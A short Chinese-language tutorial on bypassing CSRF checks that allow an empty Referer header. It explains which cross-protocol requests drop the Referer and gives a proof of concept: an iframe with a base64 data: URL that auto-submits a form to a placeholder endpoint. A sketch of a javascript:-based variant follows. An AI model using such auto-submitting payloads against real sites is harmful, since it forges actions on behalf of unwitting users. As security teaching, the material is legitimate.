CSRF - 空Referer绕过

在实际环境中，服务器很多CGI由于一些历史原因，必须允许空Referer的请求。比如：老的客户端版本请求的时候就没有Referer，总不能在服务端一刀切，让老版本的用户都无法正常使用了吧。

这样的CGI就存在CSRF攻击的风险。那么我们该如何在真实环境中构造一个可利用的POC呢？

我们知道正常的页面跳转，浏览器都会自动带上Referer，那么现在的问题就变成了什么情况下浏览器会不带Referer？通过一些资料，可以大致总结为两种情况：

1.通过地址栏，手动输入；从书签里面选择；通过实现设定好的手势。上面说的这三种都是用户自己去操作，因此不算CSRF。

2.跨协议间提交请求。常见的协议：ftp://,http://,https://,file://,javascript:,data:.最简单的情况就是我们在本地打开一个HTML页面，这个时候浏览器地址栏是file://开头的，如果这个HTML页面向任何http站点提交请求的话，这些请求的Referer都是空的。那么我们接下来可以利用data:协议来构造一个自动提交的CSRF攻击。当然这个协议是IE不支持的，我们可以换用javascript:

假如http://a.b.com/d 这个接口存在空Referer绕过的CSRF，那么我们的POC可以是这样的：

<html>
    <body>
       <iframe src="data:text/html;base64,PGZvcm0gbWV0aG9kPXBvc3QgYWN0aW9uPWh0dHA6Ly9hLmIuY29tL2Q+PGlucHV0IHR5cGU9dGV4dCBuYW1lPSdpZCcgdmFsdWU9JzEyMycvPjwvZm9ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0Pg==">
    </doby>
</html>

　　

上面iframe的src的代码其实是：

<form method=post action=http://a.b.com/d><input type=text name='id' value='123'/></form><script>document.forms[0].submit();</script>

　　

自动提交表单到有缺陷的CGI.

刚才说了上面的POC对IE支持不好，那么我们可以用javascript:协议来实现一个类似的，大致思路是这样的，具体构造代码我不弄了：

<iframe id="a" src=""></iframe>
<script>
    document.getElementById("a").src='javascript:"<html><body>wooyun.org<scr'+'ipt>eval(xx)</scr'+'ipt></body></html>"';
</script>